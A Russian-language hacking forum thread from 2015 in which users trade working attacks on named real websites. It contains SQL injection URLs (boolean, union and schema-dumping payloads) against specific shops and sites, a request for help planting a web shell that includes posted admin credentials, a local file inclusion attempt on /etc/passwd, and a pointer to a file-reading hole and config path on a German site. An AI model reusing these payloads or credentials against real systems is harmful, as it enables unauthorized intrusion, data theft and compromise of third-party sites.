ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.01.2015, 22:49
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от MaxFast
MaxFast said:
Так какой же вектор применим к этому случаю?
Код:
Code:
xttp://www.wyrgorod.ru/shop/subcategory_10(*)_0.html
Error-based, который использовал BigBear ничего не дал, может быть это просто ошибка?
Код:
Code:
http://www.wyrgorod.ru/shop/subcategory_10000000%27+union+select+version%28%29--+_0.html
|
|
|
03.01.2015, 22:50
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от MaxFast
MaxFast said:
Так какой же вектор применим к этому случаю?
Код:
Code:
xttp://www.wyrgorod.ru/shop/subcategory_10(*)_0.html
Error-based, который использовал BigBear ничего не дал, может быть это просто ошибка? Конечно это так. Я вообще хрен знает, что делаю на этом форуме. Сижу, фигнёй страдаю.
Boolean Based
http://www.wyrgorod.ru/shop/subcategory_10'and(substr(@@version,1,1))=5+--+_0.html TRUE
http://www.wyrgorod.ru/shop/subcategory_10'and(substr(@@version,1,1))=4+--+_0.html FALSE
Union Based
http://www.wyrgorod.ru/shop/subcategory_10'and(1)=2+union+select+@@version+--+_0.html
Хватит вариантов?
|
|
|
|
10.01.2015, 15:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Всем привет! Не могу залить шелл на сайт, через форму заливки я загружаю шелл.. пишет "Файл успешно загружен" но шелла на сайте так и нет.
Код:
Code:
http://hts.kharkov.ua/admin/update_graph.php
Email: reddd14@mail.ru
Password: 55755575
Помимо этой админки есть ещё и другая
Код:
Code:
http://hts.kharkov.ua/admin.php
г-н winstrool сказал, что пароль может быть спрятан "в локальной читалке" но я уже все архивы по перекачивал, старицы по пересматривал и сканером ArxScanSite 3.0 прошёлся, но увы. Помогите с заливкой шелла! |
|
|
|
10.01.2015, 17:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Select schema_name from information_schema.schemata
для MsSQL выводит список всех dbs. Как дальше через infromation_schema вывести таблицы и колонки другой базы данных?
Select table_name from information_schema.tables where...
а как связать со schema_name?
|
|
|
|
10.01.2015, 17:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от vikler
vikler said:
Select schema_name from information_schema.schemata
для MsSQL выводит список всех dbs. Как дальше через infromation_schema вывести таблицы и колонки другой базы данных?
Select table_name from information_schema.tables where...
а как связать со schema_name?
select table_name from information_schema.tables where table_schema='information_schema' , где 'information_schema' - нужная бд. если фильтрует кавычки, то select table_name from information_schema.tables where table_schema=0x696E666F726D6174696F6E5F736368656D6 1
|
|
|
|
10.01.2015, 19:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
подскажите,есть ли тут инклюд? сколько не набираю ../ всё равно одно и тоже http://www.xn--brliner-kseblatt-vnbi.de/?site=regional&land=DE&bl=/etc/passwd
|
|
|
|
10.01.2015, 22:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Сообщение от Br@!ns
Br@!ns said:
select table_name from information_schema.tables where table_schema='information_schema' , где 'information_schema' - нужная бд. если фильтрует кавычки, то select table_name from information_schema.tables where table_schema=0x696E666F726D6174696F6E5F736368656D6 1
да-да, я так и делала,в идно нет прав на чтение других бд
Object reference not set to an instance of an object
|
|
|
|
10.01.2015, 22:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Вот тебе БД.. выбирай любую. Но залить шелл не получится
Код:
Code:
http://www.hts.kharkov.ua/news_full.php?id=1%27+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,2,3+--+
|
|
|
|
11.01.2015, 03:10
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от madam
madam said:
подскажите,есть ли тут инклюд? сколько не набираю ../ всё равно одно и тоже http://www.xn--brliner-kseblatt-vnbi.de/?site=regional&land=DE&bl=/etc/passwd
нет. ошибка внутри. кстати, там есть несколько sqli
также, читалка файлов через fread():
Код:
Code:
http://www.bärliner-käseblatt.de/?site=startseite&lang=lol
конфиг /www/htdocs/w00b2ffe/anzeiger/config/config.php
|
|
|
|
11.01.2015, 08:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
Сообщение от faza02
faza02 said:
нет. ошибка внутри. кстати, там есть несколько sqli
также, читалка файлов через fread():
Код:
Code:
http://www.bärliner-käseblatt.de/?site=startseite&lang=lol
конфиг
/www/htdocs/w00b2ffe/anzeiger/config/config.php спасибо,про sqli я видела,интересней было бы мини шелл получить))
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
